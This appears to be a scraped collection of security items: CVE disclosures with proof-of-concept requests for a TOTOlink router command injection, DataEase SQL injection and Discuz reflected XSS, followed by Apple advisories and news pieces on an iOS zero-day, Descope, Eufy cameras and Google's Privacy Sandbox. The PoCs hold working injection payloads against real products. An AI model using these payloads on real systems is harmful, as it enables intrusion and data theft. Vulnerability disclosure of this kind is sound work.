TOTOlink A7100RU(V7.4cu.2313_B20191024) was discovered to contain a command injection vulnerability via the city parameter at setting/delStaticDhcpRules.

**TOTOlink A7100RU(V7.4cu.2313\_B20191024)路由器存在命令注入漏洞****写在前面**

厂商信息：http://totolink.net/

固件下载地址：http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1.影响版本**

图1为固件版本信息

**2.漏洞细节**

程序通过获取city参数下的内容传递给v12，之后将v12带入到Uci\_Set\_Str函数中

在Uci\_Set\_Str函数中，通过snprintf函数，将a4匹配到的内容格式化进v11，之后将v11带入cstesystem函数中

函数直接将用户输入内容带入到execv函数中，存在命令注入漏洞

**POC**

POST /cgi\-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content\-Length: 79
Accept: \*/\*
X\-Requested\-With: XMLHttpRequest
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Content\-Type: application/x\-www\-form\-urencoded; charset\=UTF\-8
Origin: <http://192.168.0.1>
Referer: <http://192.168.0.1/adm/status.asp?timestamp=1647872753309>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q\=0.9
Cookie: SESSION\_ID\=2:1647872744:2
Connection: close

{"topicurl":"setting/delStaticDhcpRules",
"city":"1$(ls>/tmp/123;)"}

复现结果如下

图2 POC攻击效果

最后，您可以编写exp，这可以实现获得根shell的非常稳定的效果

CVE-2023-24238: ttt/20 at main · Am1ngl/ttt

Developers don't have to build authentication and user management from scratch, and can devote their energies to the core functions of the application, instead.

Descope emerged from stealth on Wednesday with a frictionless, secure, and developer-friendly authentication and user management service.

There is always a point in application development when a decision has to be made, to either build user authentication in-house or use someone else's. It's not a one-time decision, either, since user authentication is more than just setting up a username and password. There has to be a process for password resets, a way to add layers of authentication, a mechanism to securely store credentials, and controls to detect and prevent fraud and bots. All that comes before figuring out user provisioning, tackling access control, or even incorporating single sign-on.

"Authentication is never finished for any application," wrote Slavik Markovich, co-founder and CEO of Descope.

Descope's core premise is based on a simple fact: developers should not be spending time and resources on authentication and user management if that is not the core part of the service they are building. With Descope's authentication user management platform, developers can create authentication flows, add passwordless authentication methods to their applications, manage access privileges and identities, and implement security controls to prevent account takeovers and other types of fraud – and they don't need to be security experts to have these capabilities.

“Authentication is too important to be done incorrectly, but it’s also too complicated and time-consuming to be done in-house by engineering teams,” Guru Chahal, a partner at Lightspeed Venture Partners, said in a statement.

Identity-based attacks are on the rise, which has renewed interest in passwordless technologies. The Verizon Data Breach Investigations Report found that 80% of basic web application attacks can be attributed to stolen credentials. Google and Apple have rolled out passkeys to phase out passwords and open standards like FIDO2 and WebAuthn make it easier for users to rely on their devices as an authentication factor. Descope's passwordless technology stack means organizations can make that shift to deliver a passwordless experience to users.

"Our vision is to “de-scope” authentication from every app developer’s daily work, so they can focus on business-critical initiatives without worrying about building, maintaining, or updating authentication,” Markovich said.

The platform supports different types of developers, including those who prefer no-code/low-code tools, rely on software development kits (SDKs), or prefer working with APIs. Developers can use the Descope platform without charge for up to 7,500 monthly active users for business-to-consumer (b2c) applications and up to 50 tenants for business-to-business (b2b) applications.

Descope has raised $53 million in seed funding, the company said. The founding team has worked together for years, at security orchestration, automation, and response startup Demisto, which was acquired by Palo Alto Networks in 2019, and database security company Sentrigo, which was acquired by McAfee in 2011.

Descope Handles Authentication So Developers Don't Have To

SQL Injection vulnerability in dataease before 1.2.0, allows attackers to gain sensitive information via the orders parameter to /api/sys_msg/list/1/10.

\*\*DataEase \*\*  
1.1.0-rc2

**Bug 描述**  
SQL Injection

\*\*Bug \*\*  
url:/api/sys\_msg/list/1/10

    POST /api/sys_msg/list/1/10 HTTP/1.1
    Host: demo.dataease.io
    Cookie: sysUiInfo={%22ui.logo%22:{%22paramKey%22:%22ui.logo%22%2C%22paramValue%22:null%2C%22type%22:%22file%22%2C%22sort%22:1%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.loginLogo%22:{%22paramKey%22:%22ui.loginLogo%22%2C%22paramValue%22:null%2C%22type%22:%22file%22%2C%22sort%22:2%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.loginImage%22:{%22paramKey%22:%22ui.loginImage%22%2C%22paramValue%22:null%2C%22type%22:%22file%22%2C%22sort%22:3%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.loginTitle%22:{%22paramKey%22:%22ui.loginTitle%22%2C%22paramValue%22:%22%E4%BA%BA%E4%BA%BA%E5%8F%AF%E7%94%A8%E7%9A%84%E5%BC%80%E6%BA%90%E6%95%B0%E6%8D%AE%E5%8F%AF%E8%A7%86%E5%8C%96%E5%88%86%E6%9E%90%E5%B7%A5%E5%85%B7%22%2C%22type%22:%22text%22%2C%22sort%22:4%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.title%22:{%22paramKey%22:%22ui.title%22%2C%22paramValue%22:%22%22%2C%22type%22:%22text%22%2C%22sort%22:5%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.favicon%22:{%22paramKey%22:%22ui.favicon%22%2C%22paramValue%22:null%2C%22type%22:%22file%22%2C%22sort%22:6%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.demo.tips%22:{%22paramKey%22:%22ui.demo.tips%22%2C%22paramValue%22:%22user:%20demo%20password:%20dataease%22%2C%22type%22:%22text%22%2C%22sort%22:100%2C%22file%22:null%2C%22fileName%22:null}}; language=zh_CN; Authorization=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2MjgwNDI1MDgsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.zxOvmJQ_SRyahe5yJjrhMCSp_mUzNF88iF4yrZKZ2OA
    Content-Length: 65
    Sec-Ch-Ua: "Chromium";v="92", " Not A;Brand";v="99", "Google Chrome";v="92"
    Link-Pwd-Token: undefined
    Accept-Language: zh-CN
    Sec-Ch-Ua-Mobile: ?0
    Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2MjgwNDI1MDgsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.zxOvmJQ_SRyahe5yJjrhMCSp_mUzNF88iF4yrZKZ2OA
    Content-Type: application/json;charset=UTF-8
    Accept: application/json, text/plain, */*
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
    Origin: https://demo.dataease.io
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://demo.dataease.io/?
    Accept-Encoding: gzip, deflate
    Connection: close
    
    {"orders":["(select*from(select+sleep(10)union/**/select+1)a) "]}
    

  
  
payload：extractvalue('anything',concat('~',(select database())))

CVE-2021-38239: [Bug]SQL Injection · Issue #510 · dataease/dataease

Cross site scripting (XSS) vulnerability in DiscuzX 3.4 allows attackers to execute arbitrary code via the datetline, title, tpp, or username parameters via the audit search.

**Description**

Admin backend audit search of content audit component with reflected-XSS in POST value “dateline”, “title”, “tpp” and “username”, which bypassed discuz security check and even could hijack callback url link, and it can also inject javascript to setTimeout at the end of html response.

**Affected Version**

DiscuzX <= 3.4, SC\_UTF8\_20221111

**POC**

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  
16  

POST /cms/discuz/upload/admin.php?action=moderate&operation=threads HTTP/1.1  
Host: 192.168.0.4  
Content-Length: 166  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
Origin: http://192.168.0.4  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_15\_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer: http://192.168.0.4/cms/discuz/upload/admin.php?action=moderate&operation=threads  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8  
Cookie: 5Kkn\_2132\_saltkey=y03s5T45; 5Kkn\_2132\_lastvisit=1668496347; 5Kkn\_2132\_ulastactivity=07108qps3b3FkXEEZNxrT%2BtyQpXYN9%2FSOodQCNbMLoO%2BO6DOk8pF; 5Kkn\_2132\_auth=7791L55DZFdkAgcM5rDcnjIiVH0t%2BptlGCIqLkAhUIRMsUDTnq%2BGi7atBCt%2BPdyl2mCVv0hA3jA%2BxaOfDB1h; 5Kkn\_2132\_lastcheckfeed=1%7C1668501456; 5Kkn\_2132\_nofavfid=1; 5Kkn\_2132\_sid=yhpz44; 5Kkn\_2132\_lip=172.17.0.1%2C1668502019; 5Kkn\_2132\_lastact=1668502045%09admin.php%09  
Connection: close  
  
formhash=288a0c1d&scrolltop=&anchor=&username=aa&title=aa&tpp=20&filter=normal&modfid=all&dateline=604"></a><script>alert(1)</script><!--&modsubmit=%E6%8F%90%E4%BA%A4  

**Reference**

*   Gitee Issues (Login Required)
*   CVE

> Reported by Srpopty, vulnerability discovered by using Corax.

CVE-2022-45543: Vulnerability - Discuz X3.4 Backend Reflected XSS (CVE-2022-45543)

Apple Security Advisory 2023-02-13-3 - Safari 16.3.1 addresses a code execution vulnerability.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-2023-02-13-3 Safari 16.3.1Safari 16.3.1 addresses the following issues.Information about the security content is also available athttps://support.apple.com/HT213638.WebKitAvailable for: macOS Big Sur and macOS MontereyImpact: Processing maliciously crafted web content may lead toarbitrary code execution. Apple is aware of a report that this issuemay have been actively exploited.Description: A type confusion issue was addressed with improvedchecks.WebKit Bugzilla: 251944CVE-2023-23529: an anonymous researcherAll information is also posted on the Apple Security Updatesweb site: https://support.apple.com/en-us/HT201222.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmPq5PMACgkQ4RjMIDkeNxmFTBAA05jcHEZOdXuE0BQKft0qoWItZ2Dg0p/ONxiqS9ihNDqBt+6q+yOORvr4Vr2iVpCpo4F5nQv/qBApGCS84SVN9rRIM1VteOYIObgpo37CceODrbywjSTHcD6GbR47ra8reQK10sDSIoQtX1XKGUltUC/RfKnVDtk/coNu7TJj/VVg2YNPOlQFc5ETie0d/NOcK+8Ds1NvK4HQ0Gfq+KHmE507T7nAMfcK4YVlZCtkz4YHEa9w9AcIgmQ4nzlOSEs5mHu2egr70Xy8+CL7i82Oh2FBzVetLkDhhrZppjykX7zK4Lc0cbABpiaIu/6ObPGhoW4sFfPCJa8NSflRLKe+aNHdyuzjuqx8rSeqFdP4+rhdI/X2Z/9VKsB/1Tch55nuBhEGZTejmdwtorGf1+otfW5XpWOGXwnE9sR0qjVvwPwfuK5noLUoLvBRfiK6xaKUG6IXEYCt0rVncJJ9QtJJKYvqhbf3OwNodrA/V9AAm2MTtIo514BkfZHtv01xOm7tv35a+5QFcoW/iJBvdTxGVCwzb+2AshMCqO9MQxt8cWknC41K0l6Fl6Yl/P0qzUJr4NoG72LwW0PqaHimWDVAqJcAHsESe/1qnLO3rZItQJByxURc4wUpHAojsFBEBtLiS7FNHOvw4bM1ylQIXXoiFD7sE9NpvksUDzNoRdyAEOM==b0uc-----END PGP SIGNATURE-----

Apple Security Advisory 2023-02-13-3

Apple Security Advisory 2023-02-13-2 - macOS Ventura 13.2.1 addresses code execution and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2023-02-13-2 macOS Ventura 13.2.1

macOS Ventura 13.2.1 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213633.

Kernel  
Available for: macOS Ventura  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2023-23514: Xinru Chi of Pangu Lab, Ned Williamson of Google  
Project Zero

Shortcuts  
Available for: macOS Ventura  
Impact: An app may be able to observe unprotected user data  
Description: A privacy issue was addressed with improved handling of  
temporary files.  
CVE-2023-23522: Wenchao Li and Xiaolong Bai of Alibaba Group

WebKit  
Available for: macOS Ventura  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution. Apple is aware of a report that this issue  
may have been actively exploited.  
Description: A type confusion issue was addressed with improved  
checks.  
WebKit Bugzilla: 251944  
CVE-2023-23529: an anonymous researcher

macOS Ventura 13.2.1 may be obtained from the Mac App Store or  
Apple's Software Downloads web site:  
https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmPq5PIACgkQ4RjMIDke  
NxkM2hAApRo7JQlaNxVVpw1y96PG2oAVygFVw+N1cpEO72L4gDjvAb7+tOBqUTkz  
Az+IizQfC2gapw9g/csghk+s+/gt16Q0iX4jDDEDypZ5So/LoaucFVTbGCy9Hns0  
T0PTS4a0KIFBHbRQ3ktrhkUp49ykqDWwWdnvM1QgtUe3HfAZQWHVnYpdsj26CTaz  
5ihA0chuzAGnx2lUZbyz8nl6f9kdqx1x8uSF0P7AkIp6L7IcZOLLO8tXnKApeC7S  
HSbafe7JKxVNPtzaI/ZuxQe9/9Kr8VUiezVCK+WvJ9akRsy4CQ022yirIOlFIEhF  
32mFq+BaQ77YTULP2us7BG8oMJ3tPxfmlykhqD4P0p4JRW6ZFoQmVKyUEPdsaALG  
NYilSR3CRSpaCbh+dunGMJshNSHRJO6NluLq1mPVB7xFSiypgJADjS95zBSINtC9  
JrKusbpICiAm8VqVC4GNltG+djft0NjbSiJXPo409X7j01Bt1ZJpk2UWTUfZbHMU  
hW90JFySoHLRcVt3Af1mbBkyaHv0GSKG+Fjul/XyBlG3U8eJVXJhWCrhMjm17GK0  
6j4HEUsAYzAg0j+Ss7QQKhwxlW3BPd+3D2kGwbPzBx/rcyVjbc456fyCLSYP58cf  
EIYmmOwF9QcH939TCxoIglHOsdAuuIilGApd2on9QWOj8QSaUFw=  
=2kFu  
-----END PGP SIGNATURE-----

Apple Security Advisory 2023-02-13-2

Apple Security Advisory 2023-02-13-1 - iOS 16.3.1 and iPadOS 16.3.1 addresses code execution and use-after-free vulnerabilities.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-2023-02-13-1 iOS 16.3.1 and iPadOS 16.3.1iOS 16.3.1 and iPadOS 16.3.1 addresses the following issues.Information about the security content is also available athttps://support.apple.com/HT213635.KernelAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, and iPadmini 5th generation and laterImpact: An app may be able to execute arbitrary code with kernelprivilegesDescription: A use after free issue was addressed with improvedmemory management.CVE-2023-23514: Xinru Chi of Pangu Lab, Ned Williamson of GoogleProject ZeroWebKitAvailable for: iPhone 8 and later, iPad Pro (all models), iPad Air3rd generation and later, iPad 5th generation and later, iPad mini5th generation and laterImpact: Processing maliciously crafted web content may lead toarbitrary code execution. Apple is aware of a report that this issuemay have been actively exploited.Description: A type confusion issue was addressed with improvedchecks.WebKit Bugzilla: 251944CVE-2023-23529: an anonymous researcherAdditional recognitionWe would like to acknowledge The Citizen Lab at The University ofToronto’s Munk School for their assistance.This update is available through iTunes and Software Update on youriOS device, and will not appear in your computer's Software Updateapplication, or in the Apple Downloads site. Make sure you have anInternet connection and have installed the latest version of iTunesfrom https://www.apple.com/itunes/  iTunes and Software Update on thedevice will automatically check Apple's update server on its weeklyschedule. When an update is detected, it is downloaded and the optionto be installed is presented to the user when the iOS device isdocked. We recommend applying the update immediately if possible.Selecting Don't Install will present the option the next time youconnect your iOS device.  The automatic update process may take up toa week depending on the day that iTunes or the device checks forupdates. You may manually obtain the update via the Check for Updatesbutton within iTunes, or the Software Update on your device.  Tocheck that the iPhone, iPod touch, or iPad has been updated:  *Navigate to Settings * Select General * Select About. The versionafter applying this update will be "iOS 16.3.1 and iPadOS 16.3.1".All information is also posted on the Apple Security Updatesweb site: https://support.apple.com/en-us/HT201222.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmPq5PIACgkQ4RjMIDkeNxk00xAA6vBGZD0tv5wi0q4B8jiJ3oz5/Om05bfUPLziPG1MvWzcFZYpQmdS+OJWq219S6uDt0m0ojPLkUgcxQ5OmQ/ViwMbawZaVOpe6aIem33iGkWFyGhvgU7EDLwJcIaXd7pMxfkI28AZUgd8Brf/UXnt1Ja13+ixDnrGT2C+3G+kst17+PZZ0bZj+MwtxDuPW6uLDegjTmjNXzWuo/mSm2MChzoygsbUOPa0Y29OhmgRCbLu/nOCcPcWRk5iYlSZU5efZ7yqpjMdIt36TCD/yAd0uttebgnKMMLNjQjDAbPj0j+5NiAmYx75DYksYCnbs+LRMJ9Fik7lA6ihCavJwgq/PZ5NKR/xA6utkpxQatpT4Swmh2mDabJJK08GT+UsTfnxRgwPnyOEcSBAg7IaMc6BxIUiVrosp4u+ZYO0QnR6z0CgI+2zqTb+HcCjOpmCYwDz8pvyO7zZF1SdZZpc6GXsxX/Aq5FahSeWQY1x4i0qbiy0AsP7JBcMbAOStKPV14Q9UJ1iTbxI1aaLYxwWmawhN2iCnfjOc+nTC6X5gNtXSF+TRtgGUO8Wr039PgF7MqJ+24UYjf0IdD9tCRaIHBGpUwFKsHhSk/hRsGi4Yov9U5Bu1BKGvTHwx714vW6p/vjKajjiP6ljtr7TDwkq1SRPSecX3jrrAGkNoJOw+0xOW5s==RxGI-----END PGP SIGNATURE-----

Apple Security Advisory 2023-02-13-1

By Deeba Ahmed
If you are using an Apple product, it is time to update it right now and make sure the automatic updates are enabled.
This is a post from HackRead.com Read the original post: Update Now: iOS Devices Receive Vital Security Updates from Apple

Apple has released an emergency security patch to fix a critical vulnerability that has been targeting all iOS devices, including iPhones, Macbooks, and Tablets.

Apple has released urgent security patches for a newly detected zero-day vulnerability that can be exploited to hack vulnerable iOS devices, including Macs, iPhones, and iPads.

The vulnerability (tracked as CVE-2023-23529) was found in the WebKit framework of the browser. So, if maliciously designed web content is processed, it would allow arbitrary code execution after an unsuspecting user visits a compromised URL.

“Apple is aware of a report that this issue may have been actively exploited,” the company noted. This explains why the iPhone maker released patches urgently for its flagship devices.

Still, the impact is extensive, as from the iPhone 8 to all subsequent iPhone models will be impacted, as well as every model of iPad Pro, the iPad Air 3rd generation and above, iPad 5th generation and above, and iPad mini 5th generation.

**Which Devices are Impacted?**

An unidentified researcher discovered the flaw, which has been patched with the latest edition of security updates. Apple didn’t specify how this vulnerability could be exploited.

In fact, it is the first time a zero-day has been defined as a newly discovered security flaw. It is a WebKit confusion issue. Moreover, all Macs running Ventura will be impacted. Fixes for all these versions were released in the security update.

**Security Update Details**

The small point update released by Apple on Monday contains WebKit security patches for iOS 16.3.1, iPadOS 16.3.1, and macOS 11.2.1 to fix a zero-day bug. The updates are available for iOS 16, iPadOS 16, macOS Ventura, and the latest edition of Apple Safari, as well as the preceding versions of Big Sur and macOS Monterey.

In addition, Apple released patches for tvOS 16.3.2 and watchOS 9.3.1. The company has yet to release the CVE entries, though. It is also unclear if a fix will be released for iOS 15 devices. If you haven’t updated your device, please do so immediately to stay safe.

1.  Microsoft fixes 6 Active 0-Day Windows Flaws
2.  Israeli Spyware Vendor Exploiting Chrome 0day
3.  Apple Debuts Lockdown Mode to Prevent Spying
4.  Apple Bug bounty: Hack Apple and earn big bucks

Update Now: iOS Devices Receive Vital Security Updates from Apple

Eufy's recent scandal shows it's not so much about the data breach but about how a company responds. Here are a few ways to shop smart.

Own a Eufy security camera or video doorbell? The recent news exposing serious security flaws from the Anker-owned brand may have caused you some anxiety. I have been testing and reviewing security cameras for several years now. Revelations about data breaches and vulnerabilities are a regular occurrence. Arlo, Nest, Ring, Wyze—every major manufacturer you can think of has had its share of scandals. But it can be challenging to look beyond hyperbolic headlines, weigh the seriousness of each issue, and figure out whether you need to worry. 

Security cameras and video doorbells have grown popular as an easy and affordable way to keep an eye on your home. Around 28 percent of Americans protect their property with security cameras, according to a Safewise survey. The systems are easy to install and promise protection from burglars and porch pirates. (Whether they actually make you safer is a question for another day.) To get a better sense of what security camera system you should invest in, how to deal with breaches, and how to find a company you can trust, we spoke to a few experts. We also took a closer look at how Eufy handled its security woes. 

Where Eufy Went Wrong

Late last year, security researcher Paul Moore demonstrated that camera systems sold with the promise of local data storage were, in fact, uploading images to the cloud. Worse yet, it was possible to stream video from a Eufy camera without encryption. When we first asked about these issues, the company issued a strong denial, saying it “adamantly disagrees with the accusations.” A couple of months later, Eufy admitted that most of the allegations were true.

A spokesperson explained to WIRED in an email that Eufy only uploaded images (video thumbnails) to deliver push notifications to customers, and in one other case for its Video Doorbell Dual, where it uploaded a face image of the user (for face recognition) to make it easier to set up multiple doorbell devices without having to upload a new image. Eufy has updated the language around its cloud use to address the first issue and removed the upload requirement for the second.

More serious was the issue of accessible unencrypted live streams outside the Eufy system. Eufy claims this required users to log in to the web portal, enter debug mode, and share a link. It’s unlikely anyone would have stumbled upon these links, but the possibility of unencrypted camera streams is a natural cause for concern. Eufy has now applied peer-to-peer encryption to its web portal (mobile app streams were always encrypted). The company flatly denies using any fixed encryption keys, insisting videos have always been encrypted with a dynamic key.

It’s worth pointing out that this isn't Eufy’s first security scandal. A bug in May 2021 exposed the live and recorded video streams from 712 customers to other Eufy app users, which is arguably worse than the more recent security flaw. But does it matter if a flaw was unlikely to have been exploited? It’s more important to look at how the company responds to these events.

Sadly, it took more than two months for Eufy’s parent company, Anker, to admit _some_ fault and apologize. Early denials sparked deeper media scrutiny as the company tried to downplay Eufy’s security failings, shredding a hard-won reputation in the process. The multiple incidents, and the fact that Eufy was caught in a lie and forced to pedal back, make it tough to regain trust. 

Eufy’s failings feel especially egregious because the company generally ticks all the right boxes. Its cameras and doorbells strike the balance between quality and affordability. Anker is a respected brand in the accessory space. And Eufy offers support for two-factor authentication, although not by default, and promises completely local storage and on-device processing for features like facial recognition.

Understand the Risks When Shopping

Despite an abundance of security camera manufacturers, pristine reputations are rare, so how do you choose wisely? “You want to go with a brand name,” says Deral Heiland, principal security researcher for the Internet of Things at Rapid7. “One you’ve heard of, because these companies have to protect their branding.”

Big brands come under greater scrutiny. They are targets for security researchers and amateur tinkerers. And they know that bad press will hurt their business. Since regulation is negligible, many no-name or little-known brands sell untested security cameras that may harbor multiple vulnerabilities. When they run into issues, they disappear or change the brand name.

Two-factor authentication (2FA) is also vital, Heiland says. It prevents anyone who has managed to get your login details from accessing your camera. With 2FA, you need the login details and a fingerprint, facial scan, or automatically generated one-time use code from an authenticator app, text message, or email. WIRED doesn’t recommend any security cameras that don’t at least offer 2FA as an option, but we’d like to see it become the default industrywide.

When you install a security camera, it’s worth thinking about what the most compromising or embarrassing thing the camera—outside or inside your house—can see. You need to understand that no internet-connected device is 100 percent safe. 

There is always a risk someone is going to gain access to the camera—“be it hackers plugging data-breached passwords in to see if people are reusing them or police who often go to companies, even without warrants, in hopes of getting footage from people’s devices without their knowledge,” says Matthew Guariglia, a policy analyst for the Electronic Frontier Foundation.

After every security camera scandal, you might see some folks argue that they don’t care who sees footage of their front door or backyard. It’s true that there is little value in many of these video streams, which makes them an unlikely target. But Guariglia says security cameras usually have powerful microphones and often pick up more than we think.

Then there’s the issue of other people’s privacy, whether it’s neighbors, window cleaners, or passersby. Security camera footage is frequently shared online without the knowledge of the people who appear in it. Most cameras offer privacy zones so you can confine recordings to your property, and you should consider placement carefully when you install cameras. 

You should also do some research before you buy. Guariglia suggests asking questions like, “What would it take for police to get footage from the company? Where is your data going to be stored? Does this company have a history of data breaches or bad cybersecurity?” Unfortunately, answers aren’t always easy to find. Apple, Arlo, Eufy, and Wyze state that they won’t share footage without a warrant or court order. Ring, however, has a close relationship with police departments, and Google _may_ share Nest footage in emergency situations where there is a threat to life.

With a local storage system, you can potentially avoid uploading video to a company server and take it out of the manufacturer’s hands. Look for end-to-end encryption (preferably as a default). You can opt for a local system with no internet connection, but you would only be able to review video when you’re home. If you have the technical know-how to hook up internet-protocol cameras and DVRs without cloud services and connect via a Virtual Private Network (VPN) service, Heiland says that’s another potentially secure route. 

Perhaps counterintuitively, it might not be a red flag if your chosen camera brand has had problems in the past, provided the company has fixed them.“It’s better if there have been vulnerabilities reported on a camera because it gives us the ability to take a look at how a company deals with them,” Heiland says. “I’d rather go with a company that’s had multiple vulnerabilities in its cameras and shows a track record of fixing them quickly than a company that’s had no vulnerabilities. Because there’s no such thing as no vulnerabilities.” 

Room for Improvement

Where does Eufy go from here? The flaws have been patched, but it says it’s planning to bring on companies in security consulting, certification, and penetration-testing to conduct a comprehensive assessment of its products and eliminate potential risks. Eufy says there will also be an independent review of its processes and practices from an as-yet-unnamed security expert, and it plans to set up a security bounty program. These are positive steps, perhaps necessary growth for any security brand that expects to be taken seriously. It’s unfortunate that it took another scandal for Eufy to act. 

If you visit a manufacturer’s website, Heiland says it should be easy to find out how to report a vulnerability. If a company has a bug bounty program offering cash rewards to security researchers (incentivizing people to test the cameras and find flaws), all the better. Arlo, Logitech, Nest, and Wyze have some kind of bug bounty program, though the focus and rewards vary. Research should also turn up reports, like this one on Ezviz by Bitdefender, which shows the company is responsive and quick to investigate and fix flaws.

Keeping things secure is not just down to the camera manufacturer. Heiland warns against recycling passwords and strongly suggests picking long, complex passwords (16 to 24 characters) that mix alphanumeric, uppercase, lowercase, and special characters. You can use a password manager to help you keep track. He also recommends setting up security cameras and IoT devices on a network separate from your main computers, laptops, and phones. Most good routers and mesh systems offer guest or IoT network options that allow this.

If you have indoor security cameras, turn them off when you’re home. Look for cameras with shutters and privacy modes, or turn them around, unplug them, or use a scheduled smart plug. Heiland says he would not have a camera in the house but has less of an issue with carefully positioned outdoor security cameras. Just remember that even if you find a system that ticks all your boxes, there’s only so much you can verify.

What to Look for When Buying a Security Camera (2023): Tips and Risks

Google announced on Tuesday that it's officially rolling out Privacy Sandbox on Android in beta to eligible mobile devices running Android 13.
"The Privacy Sandbox Beta provides new APIs that are designed with privacy at the core, and don't use identifiers that can track your activity across apps and websites," the search and advertising giant said. "Apps that choose to participate in the Beta

Google announced on Tuesday that it's officially rolling out Privacy Sandbox on Android in beta to eligible mobile devices running Android 13.

"The Privacy Sandbox Beta provides new APIs that are designed with privacy at the core, and don't use identifiers that can track your activity across apps and websites," the search and advertising giant said. "Apps that choose to participate in the Beta can use these APIs to show you relevant ads and measure their effectiveness."

Devices that have been selected for the Beta test will have a Privacy Sandbox section within Settings so as to allow users to control their participation as well as view and manage their top interests as determined by the Topics API to serve relevant ads.

The initial Topics taxonomy is set to include somewhere between a few hundred and a few thousand topics, according to Google, and will be human-curated to exclude sensitive topics.

The Beta test is expected to start off with a "small percentage" of Android 13 devices and will gradually expand over time.

The Privacy Sandbox on Android is Google's answer to Apple's App Tracking Transparency (ATT), which requires app developers to seek users' explicit consent before tracking their online behavior across apps and websites through unique identifiers. It was introduced by Apple in iOS 14.5.

The experiment is part of a broader initiative for the web that also aims to begin phasing out third-party cookies in the Chrome web browser by 2024.

The technology that underpins its ability to glean users' evolving interests is a machine learning technique called federated learning that decouples the "ability to do machine learning from the need to store the data in the cloud."

This effectively allows decentralized edge devices such as smartphones to learn a shared prediction model while keeping all the training data on device, thereby making it possible for websites to access information about consumers without compromising user privacy.

Currently, Android devices are assigned a unique user-resettable identifier that can be used by app developers for tracking online behavior. Privacy Sandbox replaces the identifier with a set of privacy-preserving tools that are engineered to limit information sharing and at the same time support personalized ads.

While Google's proposals hope to strike a balance between interest-based advertising and privacy, the company also criticized that "blunt approaches" such as those from Apple don't provide viable alternatives.

That having said, Apple's ATT has faced criticism of its own. In September 2021, Lockdown Privacy called Apple's policy "functionally useless in stopping third-party tracking" and that it "made no difference in the total number of active third-party trackers."

What's more, a report from the Financial Times in December 2021 found that apps are continuing to track users on iOS, albeit in an anonymized and aggregated fashion similar to Google's Privacy Sandbox.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#apple